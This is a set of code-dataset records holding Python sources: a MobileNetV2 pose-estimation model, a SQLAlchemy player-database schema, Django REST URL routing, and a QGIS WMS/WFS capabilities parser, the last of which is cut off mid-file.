stride=2, expansion=6, block_id=3)\n self.block4 = Mbnv2_block(make_divisble(int(32*alpha), 8), c2=32, stride=1, expansion=6, block_id=4)\n self.block5 = Mbnv2_block(make_divisble(int(32*alpha), 8), c2=32, stride=1, expansion=6, block_id=5)\n self.block6 = Mbnv2_block(make_divisble(int(32*alpha), 8), c2=48, stride=2, expansion=6, block_id=6)\n self.block7 = Mbnv2_block(make_divisble(int(48*alpha), 8), c2=48, stride=1, expansion=6, block_id=7)\n self.block8 = Mbnv2_block(make_divisble(int(48*alpha), 8), c2=48, stride=1, expansion=6, block_id=8)\n self.block9 = Mbnv2_block(make_divisble(int(48 * alpha), 8), c2=48, stride=1, expansion=6, block_id=9)\n self.block10 = Mbnv2_block(make_divisble(int(48 * alpha), 8), c2=64, stride=1, expansion=6, block_id=10)\n self.block11 = Mbnv2_block(make_divisble(int(64 * alpha), 8), c2=64, stride=1, expansion=6, block_id=11)\n self.block12 = Mbnv2_block(make_divisble(int(64 * alpha), 8), c2=64, stride=1, expansion=6, block_id=12)\n\n self.bb_last_conv = Conv(make_divisble(int(64*alpha), 8), c2=1280, k=1)\n\n # backbone\n self.backbone_sequential = nn.Sequential(\n self.conv0,\n self.block0,\n self.block1,\n self.block2,\n self.block3,\n self.block4,\n self.block5,\n self.block6,\n self.block7,\n self.block8,\n self.block9,\n self.block10,\n self.block11,\n self.block12,\n self.bb_last_conv\n )\n self.fm_p2 = self.backbone_sequential[:4] # feature map with 4 times downsample, output of block2\n self.fm_p3 = self.backbone_sequential[:7] # p3/8\n self.fm_p4 = self.backbone_sequential[:11] # p4/16\n\n # head\n # fuse-1 -------------------------------\n self.fuse1_sequential = nn.Sequential(\n Conv(1280, 64, k=1, act=\"relu\"),\n DWConvTranspose2d(64, 64, k=3, p1=1)\n )\n self.fuse1_conv = Conv(24, 64, k=1, act=\"relu\")\n\n # fuse-2 -------------------------------\n self.fuse2_sequential = nn.Sequential(\n DWConv(64, 64, k=3, act=False),\n Conv(64, 32, k=1, act=\"relu\"),\n DWConvTranspose2d(32, 32, k=3, s=2, p1=1, p2=1) # output size = (input_size - 1) * stride - 2 * padding + kernel_size + output_padding\n )\n self.fuse2_conv = Conv(16, 32, k=1, act=\"relu\")\n\n # fuse-3 -------------------------------\n self.fuse3_sequential = nn.Sequential(\n DWConv(32, 32, k=3, act=False),\n Conv(32, 24, k=1, act=\"relu\"),\n DWConvTranspose2d(24, 24, k=3, s=2, p1=1, p2=1)\n )\n self.fuse3_conv = Conv(8, 24, k=1, act=\"relu\")\n\n # final sequential ---------------------\n self.final_sequential = nn.Sequential(\n DWConv(24, 24, k=3, act=False),\n Conv(24, 24, k=1, act=\"relu\"),\n DWConv(24, 24, k=3, act=False),\n Conv(24, 24, k=1, act=\"relu\"),\n Conv(24, 14, k=1, act=False),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n # extract different scale feature maps to fuse\n fm_p2 = self.fm_p2(x) # feature map with 4 times downsample, output of block2\n fm_p3 = self.fm_p3(x) # p3/8\n fm_p4 = self.fm_p4(x) # p4/16\n\n backbone_output = self.backbone_sequential[11:](fm_p4)\n print(self.fuse1_sequential(backbone_output).shape, self.fuse1_conv(fm_p4).shape)\n # fuse backbone feature maps\n fuse1 = torch.add(self.fuse1_sequential(backbone_output), self.fuse1_conv(fm_p4))\n fuse2 = torch.add(self.fuse2_sequential(fuse1), self.fuse2_conv(fm_p3))\n fuse3 = torch.add(self.fuse3_sequential(fuse2), self.fuse3_conv(fm_p2))\n\n # final detect\n output = self.final_sequential(fuse3)\n\n return output\n\n\nif __name__ == \"__main__\":\n from thop import profile\n x = torch.randn((1, 3, 192, 192))\n\n model = HumanPose_MBN(3, 14).eval()\n\n summary(model, (3,192,192))\n flops, params = profile(model, (x,))\n print(f\"GFLOPs: {flops/1e9}, Params: {params}\")", "repo_name": "K-tang-mkv/humanpose-based-objdet", "sub_path": "models/keypoint_heatmap_mbn_v2_standard.py", "file_name": "keypoint_heatmap_mbn_v2_standard.py", "file_ext": "py", "file_size_in_byte": 4875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.add", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.add", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.add", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 107, "usage_type": "call"}, {"api_name": "torchsummary.summary", "line_number": 111, "usage_type": "call"}, {"api_name": "thop.profile", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "40954175376", "text": "from sqlalchemy import (\n create_engine,\n Column,\n Integer,\n SMALLINT,\n Enum,\n TIMESTAMP,\n VARCHAR,\n MetaData,\n)\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\nimport sqlalchemy.exc\n\nfrom contextlib import contextmanager\n\nmetadata = MetaData()\nBase = declarative_base(metadata=metadata)\n\n\nclass DB:\n def __init__(self, engine):\n\n self.engine = create_engine(engine)\n self.Session = sessionmaker(bind=self.engine)\n\n metadata.drop_all(self.engine)\n metadata.create_all(self.engine)\n\n @contextmanager\n def session(self):\n db_session = _DBSession(self.Session())\n try:\n yield db_session\n db_session.session.commit()\n except sqlalchemy.exc.SQLAlchemyError:\n db_session.session.rollback()\n raise\n finally:\n db_session.session.close()\n\n\nclass _DBSession:\n def __init__(self, session):\n self.session = session\n\n def insert_accounts(self, values):\n self.session.bulk_insert_mappings(Account, values)\n\n def insert_player_infos(self, values):\n self.session.bulk_insert_mappings(PlayerInfo, values)\n\n\nclass Account(Base):\n __tablename__ = \"accounts\"\n\n id = Column(Integer, primary_key=True)\n player_id = Column(Integer, index=True)\n last_update = Column(TIMESTAMP)\n fed_reason = Column(VARCHAR(length=256))\n player_state = Column(Enum(\"OK\", \"Deleted\", \"Fedded\", \"ERROR\"))\n\n\nclass PlayerInfo(Base):\n __tablename__ = \"player_info\"\n\n id = Column(Integer, primary_key=True)\n player_id = Column(Integer, index=True)\n num_id = Column(Integer)\n name = Column(VARCHAR(length=128))\n age = Column(SMALLINT)\n role = Column(\n Enum(\n \"Civilian\",\n \"Admin\",\n \"Helper\",\n \"Staff\",\n \"Moderator\",\n \"Reporter\",\n \"NPC\",\n \"Officer\",\n \"Wiki Contributor\",\n \"Wiki Editor\",\n \"Tester\",\n \"\",\n )\n )\n initial_signup = Column(TIMESTAMP)\n last_action = Column(TIMESTAMP)\n total_duration = Column(Integer)\n total_units = Column(\n Enum(\n \"seconds\",\n \"second\",\n \"minutes\",\n \"minute\",\n \"hours\",\n \"hour\",\n \"days\",\n \"day\",\n \"years\",\n \"year\",\n \"No Last Action\",\n ),\n )\n rank = Column(VARCHAR(128))\n level = Column(SMALLINT)\n last_update = Column(TIMESTAMP)\n", "repo_name": "TotallyNot/DBConverter", "sub_path": "db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 2577, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.MetaData", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.exc", "line_number": 37, "usage_type": "attribute"}, {"api_name": "contextlib.contextmanager", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 58, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 59, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 60, "usage_type": "call"}, {"api_name": "sqlalchemy.TIMESTAMP", "line_number": 60, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 62, "usage_type": "call"}, {"api_name": "sqlalchemy.Enum", "line_number": 62, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 68, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 68, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 69, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 69, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 70, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 70, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 71, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 71, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 72, "usage_type": "call"}, {"api_name": "sqlalchemy.SMALLINT", "line_number": 72, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 73, "usage_type": "call"}, {"api_name": "sqlalchemy.Enum", "line_number": 74, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 89, "usage_type": "call"}, {"api_name": "sqlalchemy.TIMESTAMP", "line_number": 89, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 90, "usage_type": "call"}, {"api_name": "sqlalchemy.TIMESTAMP", "line_number": 90, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 91, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 91, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 92, "usage_type": "call"}, {"api_name": "sqlalchemy.Enum", "line_number": 93, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 107, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 107, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 108, "usage_type": "call"}, {"api_name": "sqlalchemy.SMALLINT", "line_number": 108, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 109, "usage_type": "call"}, {"api_name": "sqlalchemy.TIMESTAMP", "line_number": 109, "usage_type": "argument"}]} +{"seq_id": "37761489693", "text": "from django.urls import include, path\n\nfrom rest_framework import routers\n\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\n\nfrom . import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'posts', views.PostViewSet)\nrouter.register(r'comments', views.CommentViewSet)\n\n# Wire up our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API.\nurlpatterns = [\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path('dj-rest-auth/', include('dj_rest_auth.urls')),\n path('dj-rest-auth/registration/', include('dj_rest_auth.registration.urls')),\n\n path('api/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n]\n", "repo_name": "mark-antonov/hillel_django_rest_framework", "sub_path": "blog_api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 902, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.routers", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView.as_view", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "43650469888", "text": "from collections import OrderedDict\nfrom urllib.parse import urljoin, urlparse\nfrom xml.etree import ElementTree\n\nimport re\nimport requests\n\n\nclass CapabilitiesReader():\n \"\"\"CapabilitiesReader class\n\n Load and parse WMS GetProjectSettings.and WFS Capabilities\n \"\"\"\n\n def __init__(self, generator_config, logger):\n \"\"\"Constructor\n\n :param obj generator_config: ConfigGenerator config\n :param Logger logger: Logger\n \"\"\"\n self.logger = logger\n\n # get default QGIS server URL from ConfigGenerator config\n self.default_qgis_server_url = generator_config.get(\n 'default_qgis_server_url', 'http://localhost:8001/ows/'\n ).rstrip('/') + '/'\n\n # layer opacity values for QGIS <= 3.10 from ConfigGenerator config\n self.layer_opacities = generator_config.get(\"layer_opacities\", {})\n\n # Skip group layers containing print layers\n self.skip_print_layer_groups = generator_config.get(\n 'skip_print_layer_groups', False)\n\n self.project_settings_read_timeout = generator_config.get(\n \"project_settings_read_timeout\", 60\n )\n\n # WMS GetProjectSettings\n\n def read_wms_service_capabilities(self, url, service_name, item):\n \"\"\"Load and parse WMS GetProjectSettings for a theme item.\n\n :param str url: service URL\n :param str service_name: service name\n :param object item: theme item\n \"\"\"\n\n try:\n # get GetProjectSettings\n full_url = urljoin(self.default_qgis_server_url, url)\n self.logger.info(\n \"Downloading WMS GetProjectSettings from %s\" % full_url\n )\n\n if len(full_url) > 2000:\n self.logger.warning(\n \"WMS URL is longer than 2000 characters!\")\n\n response = requests.get(\n full_url,\n params={\n 'SERVICE': 'WMS',\n 'VERSION': '1.3.0',\n 'REQUEST': 'GetProjectSettings',\n 'CLEARCACHE': '1'\n },\n timeout=self.project_settings_read_timeout\n )\n\n if response.status_code != requests.codes.ok:\n self.logger.critical(\n \"Could not get WMS GetProjectSettings from %s:\\n%s\" %\n (full_url, response.content)\n )\n return {}\n\n document = response.content\n\n # parse WMS GetProjectSettings XML\n ElementTree.register_namespace('', 'http://www.opengis.net/wms')\n ElementTree.register_namespace('qgs', 'http://www.qgis.org/wms')\n ElementTree.register_namespace('sld', 'http://www.opengis.net/sld')\n ElementTree.register_namespace(\n 'xlink', 'http://www.w3.org/1999/xlink'\n )\n root = ElementTree.fromstring(document)\n\n # use default namespace for XML search\n # namespace dict\n ns = {'ns': 'http://www.opengis.net/wms'}\n # namespace prefix\n np = 'ns:'\n if not root.tag.startswith('{http://'):\n # do not use namespace\n ns = {}\n np = ''\n\n root_layer = root.find('%sCapability/%sLayer' % (np, np), ns)\n if root_layer is None:\n self.logger.warning(\n \"No root layer found for %s: %s\" %\n (full_url, response.content)\n )\n return {}\n\n # NOTE: use ordered keys\n capabilities = OrderedDict()\n\n capabilities['name'] = service_name\n capabilities['wms_url'] = full_url\n\n # get service title\n service_title = root.find('%sService/%sTitle' % (np, np), ns)\n if service_title is not None:\n capabilities['title'] = service_title.text\n if capabilities['title'] == \"Untitled\":\n capabilities['title'] = re.sub('.*/', '', service_name)\n\n # get service abstract\n service_abstract = root.find('%sService/%sAbstract' % (np, np), ns)\n if service_abstract is not None:\n capabilities['abstract'] = service_abstract.text\n\n # collect service keywords\n keyword_list = root.find('%sService/%sKeywordList' % (np, np), ns)\n if keyword_list is not None:\n keywords = [\n keyword.text for keyword\n in keyword_list.findall('%sKeyword' % np, ns)\n if keyword.text != 'infoMapAccessService'\n ]\n if keywords:\n capabilities['keywords'] = ', '.join(keywords)\n\n # service online resouce\n online_resource = root.find('%sService/%sOnlineResource' % (np, np), ns)\n if online_resource is not None:\n capabilities['online_resource'] = online_resource.get('{http://www.w3.org/1999/xlink}href')\n\n # service contact\n contact_person = root.find(\"%sService/%sContactInformation/%sContactPersonPrimary/%sContactPerson\" % (np, np, np, np), ns)\n contact_organization = root.find(\"%sService/%sContactInformation/%sContactPersonPrimary/%sContactOrganization\" % (np, np, np, np), ns)\n contact_position = root.find(\"%sService/%sContactInformation/%sContactPosition\" % (np, np, np), ns)\n contact_phone = root.find(\"%sService/%sContactInformation/%sContactVoiceTelephone\" % (np, np, np), ns)\n contact_email = root.find(\"%sService/%sContactInformation/%sContactElectronicMailAddress\" % (np, np, np), ns)\n\n\n capabilities[\"contact\"] = {\n \"person\": contact_person.text if contact_person is not None else None,\n \"organization\": contact_organization.text if contact_organization is not None else None,\n \"position\": contact_position.text if contact_position is not None else None,\n \"phone\": contact_phone.text if contact_phone is not None else None,\n \"email\": contact_email.text if contact_email is not None else None\n }\n\n # collect internal print layers\n internal_print_layers = []\n for bg_layer in item.get('backgroundLayers', []):\n printLayer = bg_layer.get('printLayer', None)\n if printLayer:\n if isinstance(printLayer, str):\n internal_print_layers.append(printLayer)\n elif isinstance(printLayer, list):\n for entry in printLayer:\n internal_print_layers.append(entry.get('name'))\n\n # collect WMS layers\n default_root_name = urlparse(full_url).path.split('/')[-1]\n layer_names = []\n capabilities['root_layer'] = self.collect_wms_layers(\n root_layer, layer_names, internal_print_layers, ns, np, default_root_name\n )\n # collect geometryless WMS layers\n geometryless_layers = self.collect_geometryless_layers(\n root_layer, internal_print_layers, ns, np, default_root_name\n )\n if capabilities['root_layer'] is None:\n self.logger.warning(\n \"No (non geometryless) layers found for %s: %s\" %\n (full_url, response.content)\n )\n return {}\n # Check if a layer has the same name as the root layer - and if so, abort\n root_layer_name = capabilities['root_layer'].get('name')\n layers = capabilities['root_layer'].get('layers')\n if layers is not None:\n for layer in layers:\n if layer.get('name') == root_layer_name:\n self.logger.critical(\n \"The service %s contains a layer with the same name as the service. Please rename the service or the layer.\"\n % root_layer_name\n )\n\n # get drawing order\n drawing_order = root.find(\n '%sCapability/%sLayerDrawingOrder' % (np, np), ns\n )\n if drawing_order is not None:\n capabilities['drawing_order'] = drawing_order.text.split(',')\n\n # GetMap formats\n capabilities['map_formats'] = list(map(lambda el: el.text, root.findall(\n '%sCapability/%sRequest/%sGetMap/%sFormat' % (np, np, np, np), ns\n )))\n\n # GetFeatureInfo formats\n capabilities['info_formats'] = list(map(lambda el: el.text, root.findall(\n '%sCapability/%sRequest/%sGetFeatureInfo/%sFormat' % (np, np, np, np), ns\n )))\n\n # collect print templates\n print_templates = self.print_templates(root, np, ns)\n if print_templates:\n capabilities['print_templates'] = print_templates\n\n if internal_print_layers:\n capabilities['internal_print_layers'] = internal_print_layers\n\n if geometryless_layers:\n capabilities['geometryless_layers'] = geometryless_layers\n\n return capabilities\n except Exception as e:\n self.logger.critical(\n \"Could not get WMS GetProjectSettings from %s:\\n%s\" %\n (full_url, e)\n )\n return {}\n\n def collect_wms_layers(self, layer, layer_names, internal_print_layers, ns, np,\n fallback_name=\"\"):\n \"\"\"Recursively collect layer info for layer subtree from\n WMS GetProjectSettings.\n\n :param Element layer: GetProjectSettings layer node\n :param list(str) internal_print_layers: List of internal print layers\n to filter\n :param obj ns: Namespace dict\n :param str np: Namespace prefix\n :param str fallback_name: Layer name if empty in GetProjectSettings\n \"\"\"\n # NOTE: use ordered keys\n wms_layer = OrderedDict()\n\n layer_name_tag = layer.find('%sName' % np, ns)\n if layer_name_tag is not None:\n layer_name = layer_name_tag.text\n else:\n layer_name = fallback_name\n\n if \",\" in layer_name:\n self.logger.warning(\n f\"The layer '{layer_name}' contains a comma! \"\n \"The WMS name of a layer must not contain a comma! \"\n \"Either remove the comma or specify 'short_name' in the QGIS project.\"\n )\n if layer_name in layer_names:\n self.logger.warning(\n f\"Duplicate layer name '{layer_name}'! \"\n \"Please rename the duplicate occurrences.\"\n )\n else:\n layer_names.append(layer_name)\n\n wms_layer['name'] = layer_name\n\n layer_title_tag = layer.find('%sTitle' % np, ns)\n if layer_title_tag is not None:\n wms_layer['title'] = layer_title_tag.text\n\n # collect dimensions\n wms_layer['dimensions'] = []\n for dim in layer.findall(\"%sDimension\" % np, ns):\n wms_layer['dimensions'].append({\n 'units': dim.get('units'),\n 'name': dim.get('name'),\n 'multiple': dim.get('multipleValues') == '1',\n 'value': dim.text,\n 'fieldName': dim.get('fieldName', None),\n 'endFieldName': dim.get('endFieldName', None)\n })\n\n # collect sub layers if group layer\n group_layers = []\n for sub_layer in layer.findall('%sLayer' % np, ns):\n sub_layer_name = sub_layer.find('%sName' % np, ns).text\n\n if sub_layer_name in internal_print_layers:\n # skip internal print layers\n if self.skip_print_layer_groups:\n return None\n else:\n continue\n\n sub_wms_layer = self.collect_wms_layers(\n sub_layer, layer_names, internal_print_layers, ns, np\n )\n if sub_wms_layer is not None:\n group_layers.append(sub_wms_layer)\n\n if group_layers:\n # group layer\n wms_layer[\"expanded\"] = layer.get(\n 'expanded', '1') == '1'\n wms_layer[\"mutuallyExclusive\"] = layer.get(\n 'mutuallyExclusive') == '1'\n wms_layer['layers'] = group_layers\n else:\n # layer\n if (\n layer.get('geometryType') == 'WKBNoGeometry'\n or layer.get('geometryType') == 'NoGeometry'\n ):\n # skip layer without geometry\n return None\n\n # collect attributes\n attributes = []\n attrs = layer.find('%sAttributes' % np, ns)\n if attrs is not None:\n for attr in attrs.findall('%sAttribute' % np, ns):\n attributes.append(attr.get('alias', attr.get('name')))\n attributes.append('geometry')\n attributes.append('maptip')\n\n if attributes:\n wms_layer['attributes'] = attributes\n\n if layer.find('%sAbstract' % np, ns) is not None:\n wms_layer[\"abstract\"] = layer.find('%sAbstract' % np, ns).text\n\n if layer.find('%sKeywordList' % np, ns):\n keywords = []\n for keyword in layer.find('%sKeywordList' % np, ns).findall(\n '%sKeyword' % np, ns):\n keywords.append(keyword.text)\n wms_layer[\"keywords\"] = \", \".join(keywords)\n\n\n try:\n wms_layer[\"attribution\"] = layer.find('%sAttribution' % np, ns).find('%sTitle' % np, ns).text\n wms_layer[\"attributionUrl\"] = layer.find('%sAttribution' % np, ns).find('%sOnlineResource' % np, ns).get('{http://www.w3.org/1999/xlink}href')\n except:\n pass\n\n try:\n wms_layer[\"dataUrl\"] = layer.find('%sDataURL' % np, ns).find('%sOnlineResource' % np, ns).get('{http://www.w3.org/1999/xlink}href')\n except:\n pass\n\n try:\n wms_layer[\"metadataUrl\"] = layer.find('%sMetadataURL' % np, ns).find('%sOnlineResource' % np, ns).get('{http://www.w3.org/1999/xlink}href')\n except:\n pass\n\n\n if layer.get('transparency'):\n wms_layer['opacity'] = 255 - int(float(\n layer.get('transparency')) / 100 * 255\n )\n elif layer.get('opacity'):\n wms_layer['opacity'] = int(float(layer.get(\"opacity\")) * 255)\n else:\n # custom layer opacities (default: 255)\n # name = getChildElementValue(layer, [np['ns'] + \"Name\"], ns)\n opacity = self.layer_opacities.get(layer_name, 255)\n wms_layer['opacity'] = opacity\n\n minScale = layer.find('%sMinScaleDenominator' % np, ns)\n maxScale = layer.find('%sMaxScaleDenominator' % np, ns)\n if minScale is not None:\n wms_layer[\"minScale\"] = minScale.text\n if maxScale is not None:\n wms_layer[\"maxScale\"] = maxScale.text\n\n if 'visibilityChecked' in layer.attrib:\n wms_layer['visible'] = layer.get('visibilityChecked') == '1'\n else:\n wms_layer['visible'] = layer.get('visible') == '1'\n wms_layer['geometryType'] = layer.get('geometryType')\n\n wms_layer['queryable'] = layer.get('queryable') == '1'\n if wms_layer['queryable'] and layer.get('displayField'):\n wms_layer['display_field'] = layer.get('displayField')\n\n # get default CRS (first CRS)\n wms_layer['crs'] = layer.find('%sCRS' %np, ns).text\n\n # NOTE: get geographic bounding box, as default CRS may have\n # inverted axis order with WMS 1.3.0\n bbox = layer.find('%sEX_GeographicBoundingBox' % np, ns)\n if bbox is not None:\n wms_layer['bbox'] = [\n float(bbox.find('%swestBoundLongitude' % np, ns).text),\n float(bbox.find('%ssouthBoundLatitude' % np, ns).text),\n float(bbox.find('%seastBoundLongitude' % np, ns).text),\n float(bbox.find('%snorthBoundLatitude' % np, ns).text)\n ]\n\n return wms_layer\n\n def collect_geometryless_layers(self, layer, internal_print_layers, ns, np,\n fallback_name=\"\", geometryless_layer_names=set()):\n \"\"\"Recursively collect layer names of geometryless layers from\n WMS GetProjectSettings.\n\n :param Element layer: GetProjectSettings layer node\n :param list(str) internal_print_layers: List of internal print layers\n to filter\n :param obj ns: Namespace dict\n :param str np: Namespace prefix\n :param str fallback_name: Layer name if empty in GetProjectSettings\n :param set geometryless_layer_names: A set of geometryless layer names\n \"\"\"\n # NOTE: use ordered keys\n layer_name_tag = layer.find('%sName' % np, ns)\n if layer_name_tag is not None:\n layer_name = layer_name_tag.text\n else:\n layer_name = fallback_name\n\n # collect sub layers if group layer\n group_layers = set()\n for sub_layer in layer.findall('%sLayer' % np, ns):\n sub_layer_name = sub_layer.find('%sName' % np, ns).text\n\n if sub_layer_name in internal_print_layers:\n continue\n\n sub_wms_layer = self.collect_geometryless_layers(\n sub_layer, internal_print_layers, ns, np\n )\n if sub_wms_layer is not None and isinstance(sub_wms_layer, list):\n group_layers.update(sub_wms_layer)\n elif sub_wms_layer is not None:\n group_layers.add(sub_wms_layer)\n\n if group_layers:\n # group layer\n geometryless_layer_names.update(group_layers)\n else:\n # layer\n if (\n layer.get('geometryType') == 'WKBNoGeometry'\n or layer.get('geometryType') == 'NoGeometry'\n ):\n # skip layer without geometry\n return layer_name\n else:\n return None\n\n return list(geometryless_layer_names)\n\n def print_templates(self, root, np, ns):\n \"\"\"Collect print templates from WMS GetProjectSettings.\n\n :param Element root: GetProjectSettings root node\n :param obj ns: Namespace dict\n :param str np: Namespace prefix\n \"\"\"\n print_templates = []\n composer_template_map = {}\n for template in root.findall('.//%sComposerTemplate' % np, ns):\n composer_template_map[template.get('name')] = template\n\n for template in composer_template_map.values():\n template_name = template.get('name')\n if template_name.endswith(\"_legend\") and template_name[:-7] in composer_template_map:\n continue\n\n # NOTE: use ordered keys\n print_template = OrderedDict()\n print_template['name'] = template.get('name')\n if template_name + \"_legend\" in composer_template_map:\n print_template[\"legendLayout\"] = template_name + \"_legend\";\n\n composer_map = template.find('%sComposerMap' % np, ns)\n if composer_map is not None:\n print_map = OrderedDict()\n print_map['name'] = composer_map.get('name')\n print_map['width'] = float(composer_map.get('width'))\n print_map['height'] = float(composer_map.get('height'))\n print_template['map'] = print_map\n if template.get('atlasEnabled') == '1':\n atlasLayer = template.get('atlasCoverageLayer')\n try:\n pk = root.find(\".//%sLayer/[%sName = '%s']\" % (np, np, atlasLayer), ns).find('./%sPrimaryKey/%sPrimaryKeyAttribute' % (np, np), ns).text\n print_template['atlasCoverageLayer'] = atlasLayer\n print_template['atlas_pk'] = pk\n except:\n self.logger.warning(\"Failed to determine primary key for atlas layer %s!\" % atlasLayer)\n pass\n\n labels = []\n for label in template.findall('%sComposerLabel' % np, ns):\n labels.append(label.get('name'))\n if labels:\n print_template['labels'] = labels\n\n print_templates.append(print_template)\n\n return print_templates\n\n # WFS Capabilities\n\n def read_wfs_service_capabilities(self, url, service_name, item):\n \"\"\"Load and parse WFS GetCapabilities for a theme item.\n\n NOTE: returns empty result if WFS does not contains any layers\n\n :param str url: service URL\n :param str service_name: service name\n :param object item: theme item\n \"\"\"\n try:\n # get GetProjectSettings\n full_url = urljoin(self.default_qgis_server_url, url)\n self.logger.info(\n \"Downloading WFS GetCapabilities from %s\" % full_url\n )\n\n if len(full_url) > 2000:\n self.logger.warning(\n \"WFS URL is longer than 2000 characters!\")\n\n response = requests.get(\n full_url,\n params={\n 'SERVICE': 'WFS',\n 'VERSION': '1.1.0',\n 'REQUEST': 'GetCapabilities',\n 'CLEARCACHE': '1'\n },\n timeout=self.project_settings_read_timeout\n )\n\n if response.status_code != requests.codes.ok:\n self.logger.error(\n \"Could not get WFS GetCapabilities from %s:\\n%s\" %\n (full_url, response.content)\n )\n return {}\n\n document = response.content\n\n # parse WFS Capabilities XML\n ElementTree.register_namespace('', 'http://www.opengis.net/wfs')\n ElementTree.register_namespace('ows', 'http://www.opengis.net/ows')\n ElementTree.register_namespace('gml', 'http://www.opengis.net/gml')\n ElementTree.register_namespace('ogc', 'http://www.opengis.net/ogc')\n ElementTree.register_namespace(\n 'xlink', 'http://www.w3.org/1999/xlink'\n )\n root = ElementTree.fromstring(document)\n\n # use default namespace for XML search\n # namespace dict\n ns = {\n 'ns': 'http://www.opengis.net/wfs',\n 'ows': 'http://www.opengis.net/ows'\n }\n # namespace prefix\n np = 'ns:'\n np_ows = 'ows:'\n if not 